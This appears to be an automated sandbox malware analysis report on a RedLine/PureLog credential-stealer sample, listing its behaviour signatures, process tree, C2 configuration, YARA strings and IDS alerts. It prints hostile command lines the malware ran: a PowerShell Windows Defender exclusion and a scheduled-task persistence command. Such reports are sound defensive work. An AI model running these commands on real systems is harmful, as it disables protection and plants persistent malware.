Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AENiBH7X1q.exe

Overview

General Information

Sample name:AENiBH7X1q.exe
renamed because original name is a hash value
Original sample name:78897e2d5b18ff4a71db6703ec5781abedff5794bd79fcee70babd7b0622eef8.exe
Analysis ID:1549472
MD5:fe364f6ff698a792c2f9527120136202
SHA1:f3b1c3a44b03ee27911de7a7016ee29865765788
SHA256:78897e2d5b18ff4a71db6703ec5781abedff5794bd79fcee70babd7b0622eef8
Tags:exeRedLineStealeruser-adrian__luca
Infos:

Detection

PureLog Stealer, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to detect sleep reduction / modifications
Creates files in the system32 config directory
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to many different domains
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • AENiBH7X1q.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\AENiBH7X1q.exe" MD5: FE364F6FF698A792C2F9527120136202)
    • svchost.exe (PID: 4512 cmdline: "C:\Users\user\Desktop\AENiBH7X1q.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • microsofts.exe (PID: 1816 cmdline: "C:\Users\user\AppData\Local\Temp\microsofts.exe" MD5: 1B1EC94BDE0A57A4A82BD2F20B2CB7F3)
      • Native_Redline_BTC.exe (PID: 1900 cmdline: "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe" MD5: 8C8785AC6585CF5C794B74330B3DB88F)
        • build.exe (PID: 1412 cmdline: "C:\Users\user\AppData\Local\Temp\build.exe" MD5: 3B6501FEEF6196F24163313A9F27DBFD)
        • server_BTC.exe (PID: 1352 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
          • powershell.exe (PID: 2944 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 2764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 7104 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 6348 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
          • TrojanAIbot.exe (PID: 1784 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
          • cmd.exe (PID: 2284 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpEAAD.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 1964 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • alg.exe (PID: 1492 cmdline: C:\Windows\System32\alg.exe MD5: 35184A2F5B6B06D8E814BA39A601EA5C)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 5776 cmdline: C:\Windows\system32\AppVClient.exe MD5: C44491674DD9A23CD4DB0BCF383E02D9)
  • TrojanAIbot.exe (PID: 5628 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)
  • FXSSVC.exe (PID: 432 cmdline: C:\Windows\system32\fxssvc.exe MD5: 7FF4977D46F3519BDDBBC7F980695D96)
  • elevation_service.exe (PID: 2820 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: AB5074630045AB26B71225715D67B7F6)
  • maintenanceservice.exe (PID: 7184 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 7BBB6DB310D239DA8D65A687C939EAA5)
  • msdtc.exe (PID: 7252 cmdline: C:\Windows\System32\msdtc.exe MD5: B997E00A6861615E066CA0DA6FBA54A6)
  • PerceptionSimulationService.exe (PID: 7412 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: A1956F0F6BD74F7EF4C9CB4215174395)
  • perfhost.exe (PID: 7492 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 5A2927C6AC02ED9AAA0EEAD979B6927B)
  • Locator.exe (PID: 7540 cmdline: C:\Windows\system32\locator.exe MD5: 9A657A7F089C2AF389D25AD39498587D)
  • SensorDataService.exe (PID: 7572 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 49C1710C0BFB918B23DDE91B5109B005)
  • TrojanAIbot.exe (PID: 7624 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • snmptrap.exe (PID: 7652 cmdline: C:\Windows\System32\snmptrap.exe MD5: 579893F6B0B6C9ED87C94C25F4EDC7E0)
  • Spectrum.exe (PID: 7696 cmdline: C:\Windows\system32\spectrum.exe MD5: 5C7A9FB953BDB52056F816EFDBDB2113)
  • ssh-agent.exe (PID: 7812 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: E3FDD9F1AB11BF5FA018CD72E8AF127F)
  • TieringEngineService.exe (PID: 7844 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: 34A80D2A50958A3B610C920E02938885)
  • AgentService.exe (PID: 7896 cmdline: C:\Windows\system32\AgentService.exe MD5: 9543A0B25A6C0199CB8A7CB3D1E158F8)
  • vds.exe (PID: 7936 cmdline: C:\Windows\System32\vds.exe MD5: 2DBE73EC9F3D022F74934054582A8EBA)
  • wbengine.exe (PID: 8036 cmdline: "C:\Windows\system32\wbengine.exe" MD5: C0B66BD1EE3D66E90E2046376956878E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["212.162.149.53:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\microsofts.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 33 88 44 24 2B 88 44 24 2F B0 50 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
C:\Users\user\AppData\Local\Temp\build.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000002.2126254452.0000000012F52000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000003.00000003.2390841675.0000000007550000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000004.00000000.2105969324.0000000000AB2000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000004.00000002.2126254452.0000000012E79000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000006.00000000.2122053176.0000000000DE2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 7 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                3.3.microsofts.exe.5a0000.916.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  3.3.microsofts.exe.5b0000.935.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    4.2.Native_Redline_BTC.exe.12ec4d08.4.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      2.2.svchost.exe.5800000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                      • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                      • 0x700:$s3: 83 EC 38 53 B0 33 88 44 24 2B 88 44 24 2F B0 50 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                      • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                      • 0x1e9d0:$s5: delete[]
                      • 0x1de88:$s6: constructor or from DllMain.
                      3.3.microsofts.exe.5a0000.915.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Click to see the 33 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1352, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 2944, ProcessName: powershell.exe
                        Sigma detected: Execution of Suspicious File Type Extension
                        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1352, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 2944, ProcessName: powershell.exe
                        Sigma detected: Startup Folder File Write
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 1352, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                        Sigma detected: Suspicious Add Scheduled Task Parent
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1352, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f, ProcessId: 6348, ProcessName: schtasks.exe
                        Sigma detected: Suspicious Outbound SMTP Connections
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\microsofts.exe, Initiated: true, ProcessId: 1816, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49711
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1352, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f, ProcessId: 6348, ProcessName: schtasks.exe
                        Sigma detected: Uncommon Svchost Parent Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\AENiBH7X1q.exe", CommandLine: "C:\Users\user\Desktop\AENiBH7X1q.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\AENiBH7X1q.exe", ParentImage: C:\Users\user\Desktop\AENiBH7X1q.exe, ParentProcessId: 6600, ParentProcessName: AENiBH7X1q.exe, ProcessCommandLine: "C:\Users\user\Desktop\AENiBH7X1q.exe", ProcessId: 4512, ProcessName: svchost.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1352, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 2944, ProcessName: powershell.exe
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\AENiBH7X1q.exe", CommandLine: "C:\Users\user\Desktop\AENiBH7X1q.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\AENiBH7X1q.exe", ParentImage: C:\Users\user\Desktop\AENiBH7X1q.exe, ParentProcessId: 6600, ParentProcessName: AENiBH7X1q.exe, ProcessCommandLine: "C:\Users\user\Desktop\AENiBH7X1q.exe", ProcessId: 4512, ProcessName: svchost.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-05T17:03:02.887458+010020229301A Network Trojan was detected4.175.87.197443192.168.2.559401TCP
                        2024-11-05T17:03:42.742917+010020229301A Network Trojan was detected4.175.87.197443192.168.2.559640TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-05T17:04:23.874141+010020516511A Network Trojan was detected192.168.2.5549961.1.1.153UDP
                        2024-11-05T17:04:26.438965+010020516511A Network Trojan was detected192.168.2.5562571.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-05T17:04:48.309363+010020516531A Network Trojan was detected192.168.2.5562791.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-05T17:02:57.456122+010020516491A Network Trojan was detected192.168.2.5511971.1.1.153UDP
                        2024-11-05T17:02:58.738163+010020516491A Network Trojan was detected192.168.2.5541471.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-05T17:02:56.050638+010020516481A Network Trojan was detected192.168.2.5555751.1.1.153UDP
                        2024-11-05T17:02:57.087877+010020516481A Network Trojan was detected192.168.2.5503571.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-05T17:02:53.521181+010020181411A Network Trojan was detected18.141.10.10780192.168.2.549706TCP
                        2024-11-05T17:02:54.601386+010020181411A Network Trojan was detected54.244.188.17780192.168.2.549710TCP
                        2024-11-05T17:02:57.035218+010020181411A Network Trojan was detected44.221.84.10580192.168.2.559392TCP
                        2024-11-05T17:03:17.701232+010020181411A Network Trojan was detected47.129.31.21280192.168.2.559491TCP
                        2024-11-05T17:03:19.520664+010020181411A Network Trojan was detected13.251.16.15080192.168.2.559498TCP
                        2024-11-05T17:03:26.271989+010020181411A Network Trojan was detected34.246.200.16080192.168.2.559538TCP
                        2024-11-05T17:03:27.269331+010020181411A Network Trojan was detected18.208.156.24880192.168.2.559550TCP
                        2024-11-05T17:03:34.829754+010020181411A Network Trojan was detected35.164.78.20080192.168.2.559592TCP
                        2024-11-05T17:03:35.730953+010020181411A Network Trojan was detected3.94.10.3480192.168.2.559599TCP
                        2024-11-05T17:03:53.102955+010020181411A Network Trojan was detected34.211.97.4580192.168.2.559724TCP
                        2024-11-05T17:04:01.083801+010020181411A Network Trojan was detected18.246.231.12080192.168.2.559752TCP
                        2024-11-05T17:04:02.298627+010020181411A Network Trojan was detected3.254.94.18580192.168.2.559754TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-05T17:02:53.521181+010020377711A Network Trojan was detected18.141.10.10780192.168.2.549706TCP
                        2024-11-05T17:02:54.601386+010020377711A Network Trojan was detected54.244.188.17780192.168.2.549710TCP
                        2024-11-05T17:02:57.035218+010020377711A Network Trojan was detected44.221.84.10580192.168.2.559392TCP
                        2024-11-05T17:03:17.701232+010020377711A Network Trojan was detected47.129.31.21280192.168.2.559491TCP
                        2024-11-05T17:03:19.520664+010020377711A Network Trojan was detected13.251.16.15080192.168.2.559498TCP
                        2024-11-05T17:03:26.271989+010020377711A Network Trojan was detected34.246.200.16080192.168.2.559538TCP
                        2024-11-05T17:03:27.269331+010020377711A Network Trojan was detected18.208.156.24880192.168.2.559550TCP
                        2024-11-05T17:03:34.829754+010020377711A Network Trojan was detected35.164.78.20080192.168.2.559592TCP
                        2024-11-05T17:03:35.730953+010020377711A Network Trojan was detected3.94.10.3480192.168.2.559599TCP
                        2024-11-05T17:03:53.102955+010020377711A Network Trojan was detected34.211.97.4580192.168.2.559724TCP
                        2024-11-05T17:04:01.083801+010020377711A Network Trojan was detected18.246.231.12080192.168.2.559752TCP
                        2024-11-05T17:04:02.298627+010020377711A Network Trojan was detected3.254.94.18580192.168.2.559754TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-05T17:02:58.582766+010028508511Malware Command and Control Activity Detected192.168.2.559396172.234.222.13880TCP
                        2024-11-05T17:04:00.505646+010028508511Malware Command and Control Activity Detected192.168.2.55975118.208.156.24880TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: AENiBH7X1q.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
